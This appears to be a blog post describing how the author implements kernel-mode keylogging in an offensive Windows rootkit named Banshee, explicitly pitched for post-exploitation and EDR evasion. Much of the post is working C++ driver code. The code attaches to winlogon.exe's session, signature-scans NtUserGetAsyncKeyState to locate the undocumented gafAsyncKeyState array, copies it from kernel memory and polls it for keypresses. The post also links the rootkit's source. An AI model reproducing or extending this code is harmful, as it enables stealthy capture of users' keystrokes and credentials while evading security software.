Keylogging in the Windows Kernel with undocumented data structures

If you are into rootkits and offensive windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation, by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they talk about using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion - EDR is getting tougher to evade in userland and Windows drivers are full of vulnerabilites which can be exploited to deploy rootkits. One part of this talk however particularly caught my interest: Around the 16 minute mark, Valentina talks about kernel mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:

The basic idea revolves around gafAsyncKeyState (gaf = global af?), which is an undocumented kernel structure in win32kbase.sys used by NtUserGetAsyncKeyState (this structure exists up to Windows 10 - more on that at the end or in the talk linked above).

By first locating and then parsing this structure, we can read keystrokes the way that NtUserGetAsyncKeyState does, without calling any APIs at all.

As always, game cheaters have been ahead of the curve, since they have been battling in the kernel with anticheats for a long time. One thread explaining this technique dates back to 2019 for example.

In the talk, they also give the idea to map this memory into a usermode virtual address, to then poll this memory from a usermode process. I roughly implemented their approach, but skipped this memory mapping part, as in my rootkit Banshee (for now) I might as well read from the kernel directly. In this short post I want to give an idea about how I approached the implementation with the guideline from the talk.

Implementation

The first challenge is of course to locate gafAsyncKeyState. Since the offset of gafAsyncKeyState in relation to win32kbase.sys base address is different across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses it in some instruction, find that instruction and then read out the target address.

Signature scanning

We know that NtUserGetAsyncKeyState needs to access this array. We can verify this by looking at the disassembly of NtUserGetAsyncKeyState in IDA, and spot a reference to our target structure, next to a MOV rax qword ptr instruction.

This is the first MOV rax qword ptr since the beginning of the function - thus we can locate it by simply scanning for the first occurence of the bytes corresponding to that instruction (starting from the functions beginning) and reading the offset from the operand.

The MOV rax qword ptr instruction is represented in bytes as followed:

0x48 0x8B 0x05 ["32 bit offset"];

So if we find that pattern and extract the offset, we can calculate the address of our target structure gafAsyncKeyState.

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.

Session driver address space

If we try to access the memory of win32kbase with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory from that address.

This is because the win32kbase.sys driver is a session driver and operates in session space, a special area of system memory that is only readable through a process running in a session. This makes sense, as the keystrokes should be handled different for every user that has a session connected.

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the !session command. In our driver, we will have to call KeStackAttachProcess, and afterwards, KeUnstackDetachProcess.

A common process to choose is winlogon.exe, as you can be sure it is always running and attached to a session. Another common choice seems to be csrss.exe, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.

Putting it all together, here we have simple code to resolve the address of gafAsyncKeyState. Error handling is omitted for brevity, and some functions (e.g. GetSystemRoutineAddress, LOG_MSG or GetPidFromProcessName are own implementations, but should be trivial to recreate and self-explanatory. Else you can look them up in Banshee):

PVOID Resolve_gafAsyncKeyState()
{
    KAPC_STATE apc;
    PVOID address = 0;
    PEPROCESS targetProc = 0;

    // Resolve winlogon's PID
    UNICODE_STRING processName;
    RtlInitUnicodeString(&processName, L"winlogon.exe");
    HANDLE procId = GetPidFromProcessName(processName); 
    PsLookupProcessByProcessId(procId, &targetProc);
        
    // Get Address of NtUserGetAsyncKeyState
    DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

    // Attach to winlogon.exe to enable reading of session space memory
    KeStackAttachProcess(targetProc, &apc);

    // Starting from NtUserGetAsyncKeyState, look for our byte signature
    for (INT i=0; i < 500; ++i)
    {
        if (
            *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
        )
        {
            // MOV rax qword ptr instruction found!
            // The 32bit param is the offset from the next instruction to the address of gafAsyncKeyState
            UINT32 offset = (*(PUINT32)(ntUserGetAsyncKeyState + i + 3));
            // Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 4 bytes for the 32bit parameter itself + the offset parsed from the parameter = our target address
            address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + offset); 
            break;
        }
    }

    LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

    // Detach from the process
    KeUnstackDetachProcess(&apc);
    
    ObDereferenceObject(targetProc);
    return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.

Parsing keystrokes

While I first started to reverse engineer NtUserGetAsyncKeyState in Ghidra, it came to my mind that folks way smarter than me already did that, and looked up the function in ReactOS.

Here, we can see how this function simply accesses the gafAsyncKeyState array with the IS_KEY_DOWN macro, to determine if a key is pressed, according to its Virtual Key-Code.

The IS_KEY_DOWN macro simply checks if the bit corresponding to the virtual key-code is set and returns TRUE if it is. So our structure, gafAsyncKeyState, is simply an array of bits that correspond to the states of our keys.

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).

// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
    // Save the previous state of the keys
    memcpy(keyPreviousStateMap, keyStateMap, 64);

    // Copy over the array into our buffer
    SIZE_T size = 0;
    MmCopyVirtualMemory(
        BeGetEprocessByPid(HandleToULong(procId)),
        gafAsyncKeyStateAddr,
        PsGetCurrentProcess(), 
        &keyStateMap,
        sizeof(UINT8[64]),
        KernelMode,
        &size
    );

    // for each keycode ...
    for (auto vk = 0u; vk < 256; ++vk) 
    {
        // ... if key is down but wasn't previously, set it in the recent-state-map as down
        if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
        {
            SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
        }
    }
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
    // Check if a key was pressed since last polling the key state
    BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
    SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
    return result;
}

Then, we can call WasKeyPressed at a regular interval to poll for keystrokes and process them in any way we like:

#define VK_A 0x41

VOID KeyLoggerFunction()
{
    while (true)
    {
        BeUpdateKeyStateMap(procId, gasAsyncKeyStateAddr);

        // POC: just check if A is pressed
        if (BeWasKeyPressed(VK_A))
        {
            LOG_MSG("A pressed\n");
        }

        // Sleep for 0.1 seconds
        LARGE_INTEGER interval;
        interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
        KeDelayExecutionThread(KernelMode, FALSE, &interval);
    }
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique - whenever the A key is pressed, we get a debug log in WinDbg.

You can read the messy code at https://github.com/eversinc33/Banshee.

Some more things to do or look out for are:

Implement it for Windows >= 11 - the structure is the same, it just is named different and needs to be dereferenced a few times to reach the array
If you are interested, go with the approach mentioned by Valentina, with mapping the structure into usermode to read it from there

Happy Hacking!